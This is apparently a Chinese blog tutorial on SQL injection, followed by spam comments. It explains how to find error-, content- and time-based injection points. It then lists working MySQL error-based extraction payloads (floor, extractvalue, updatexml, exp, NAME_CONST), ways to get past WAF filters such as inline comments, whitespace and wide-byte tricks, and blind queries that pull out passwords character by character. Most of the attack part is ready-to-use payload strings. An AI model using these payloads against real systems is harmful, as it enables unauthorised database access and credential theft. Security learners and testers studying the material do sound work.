Walks

网络安全爱好者

浅谈SQL注入

一:目录

1:如何判断SQL 注入

2:获得我们想要的数据的思路

3:绕过防御

 

二:开始

在开始之前我先谈谈我对SQL 注入的三种分类,看过很多文章,每个人基于不同的原理把SQL注入分为很多类,在这其中,我最赞成的是<SQL注入与防御>中的那种分类方法。上面把SQL注入分为这三类:基于错误,基于时间,基于内容。这同时也是我最赞成的观点。下面的一些叙述都是按照这三个类别来分别叙述的

1:如何判断SQL 注入

判断 是否是注入 总的思路在于参数后面的内容我们是否可以控制

我认为注入分为这三类,那么判断当然也按照这三类的思路。

基于错误:当我们在参数后面加个单引号,例如id=1′  可能页面会报错,是直接显示出数据库错误的那种报错。那么可能这里就是一个注入点

基于内容:用基于内容的思路来判断,就是看参数后的内容我们是否可控制,当我们用id=1可以获取一个数据页面的时候,我们可以修改一下参数,我们用id=2-1,或者id=0+1(+号需要编码,%2b)~2B..来试一试,看看返回的页面的内容是不是跟我们id=1返回的内容一致,如果返回的内容一致,那么说明id后面的参数我们是可以控制的,那么也说明这是一个注入点

基于时间:我们一样用id=1来讨论一下吧,如果我们在id=1后面加上一段代码,例如这样and if(1=1,sleep(5),1) ,这是一段if语句,就是如果1=1,则延迟5秒,否则返回1,那么当我们要访问的页面过了一段时间才可以被访问,这就说明了这是个注入点,我们在id=1后面有可以控制的参数

 

2:获得我们想要数据的思路

基于错误:个人认为基于错误是最简单的,因为他会返回数据库中的错误信息,来让我们省下很多时间,如果可以order by等 ,这些那么就更简单了。

下面提供一些报错语句:

通过floor()报错:

http://localhost/index.php?name='+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&pass=1

通过extractvalue()报错:

http://localhost/index.php?name='+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1

通过updatexml()报错:

http://localhost/index.php?name='+or+updatexml(1,concat(user(),0x7e,version()),1)+%23&pass=1

通过exp()报错:

http://localhost/index.php?name='+or+EXP(~(SELECT * from(select user())a))+%23&pass=1 通过NAME_CONST(适用于低版本)报错:

http://localhost/index.php?name='+or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)+%23&pass=1

基于内容:当我们遇到这种id=1,我们可以用id=2-1来获得相同页面的时候,我们可以这样构造语句,id=2-1/(if(user=’root’),1,0),当user是root的时候,if函数返回的值为1,id的值也就是1,返回的页面也就相同,当user不是root,if函数返回的值就是0,2-0=2,返回的页面跟我们id=1的页面是不同的,user=’root’也就是我们可以修改数据来判断的地方

基于时间:基于时间是最花费时间的,因为我们用基于时间的时候时间是不可以设置太小的,例如sleep(2),只延迟2秒。

如果网站访问速度本来就不是怎么快的话,会影响我们对数据的判断的。

基于时间的找我们可以修改数据的方法是在函数后面加判断语句,

我们可以在函数后面加if(user=’root’,sleep(5),1),这样当user=’root’的时候,就会延迟5秒,那么我们也就可以慢慢来判断我们需要的数据了

总的来说:就选择上面

基于错误>基于内容>基于时间

毕竟基于时间的方法是花费最久的,但是当前两个方法都不可用,也就是报错统一404,返回内容统一一个页面(可是是过滤了敏感参数)的时候,这时候如果是一个注入点,我们就只能用基于时间的方法了。

3:绕过防御

内联注释:

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- - 

编码绕过:

如URLEncode编码,ASCII,HEX,unicode编码绕过

空格绕过:

两个空格代替一个空格,用Tab代替空格 %20 %09 %0a %0b %0c %0d %a0 /**/ 

括号绕过空格 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来 select(user())from dual where 1=1 and 2=2;

换行符绕过:

%0a、%0d

宽字节绕过: 

过滤单引号时,可以试试宽字节 %bf%27 %df%27 %aa%27

反引号`绕过:

select `version()`,可以用来过空格和正则,特殊情况下还可以将其做注释符用 

等价函数绕过: 

hex()、bin() ==> ascii()

sleep() ==>benchmark()

concat_ws()==>group_concat() mid()、substr() ==> substring()

@@user ==> user() @@datadir ==> datadir()

举例:substring()和substr()无法使用时:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

或者:

substr((select 'password'),1,1) = 0x70

strcmp(left('password',1), 0x69) = 1

strcmp(left('password',1), 0x70) = 0

strcmp(left('password',1), 0x71) = -1
点赞
  1. Kareem Utecht说道:

    Howdy here, just turned aware about your web page through Bing and yahoo, and have found that it's very educational. I will take pleasure in if you retain such.

  2. CrowdforApps说道:

    Nice post. I learn something totally new and challenging on sites I stumbleupon on a daily basis. It will always be interesting to read through content from other writers and practice a little something from other websites.

  3. CrowdforThink说道:

    Way cool! Some extremely valid points! I appreciate you writing this article and the rest of the website is very good.

  4. Jami Lukehart说道:

    I could not resist commenting. Exceptionally well written!

  5. Denita Epel说道:

    Excellent web site you've got here.. It’s hard to find high quality writing like yours nowadays. I honestly appreciate people like you! Take care!!

  6. Theola Darveau说道:

    This is suitable opportunity to prepare some options for the forthcoming future. I've browsed this article and if I may just, I want to propose you handful important tip.

  7. SapidAgency说道:

    Sapid Agency is a Search Engine Optimization company in New York City that provides SEO Services. Their proprietary SEO strategies help struggling websites and aspiring business owners to rank their websites higher in multiple search engines like Google , Yahoo and Bing. They provide local and gmb map ranking for businesses in NYC and many other local areas. Find more at https://www.sapidagency.com/ @ 145 E 57TH NEW YORK, NY 10022, USA, +1 971 341 5608 USA

  8. Clarinda Nessner说道:

    It is the right opportunity to create some schemes for the future. I've read through this write-up and if I have the ability to, I want to suggest you handful of great recommendation.

  9. Karine Awtry说道:

    It is suitable opportunity to create some schedules for the forthcoming future. I have read this document and if I would, I wish to encourage you few useful instruction.

  10. Quinton Khela说道:

    Hullo there, just turned out to be receptive to your writings through Bing, and have found that it's truly informative. I’ll truly appreciate if you decide to maintain this post.

  11. I simply want to mention I am just all new to blogs and honestly enjoyed your blog. Most likely I’m want to bookmark your blog . You surely have impressive stories. Many thanks for revealing your blog.

  12. visit说道:

    I just want to tell you that I am beginner to weblog and really savored your website. Most likely I’m want to bookmark your site . You really have exceptional articles and reviews. Thanks for sharing with us your webpage.

  13. It's practically unattainable to come across well-advised men and women on this content, still you look like you fully grasp which you're covering! Bless You

  14. Faytech.us说道:

    Absolute enlightening points you'll have remarked, warm regards for posting.

  15. It is usually the right time to generate some options for the long-term. I've scan this posting and if I should, I desire to encourage you handful of significant recommendation.

发表评论

电子邮件地址不会被公开。 必填项已用*标注

13 − 5 =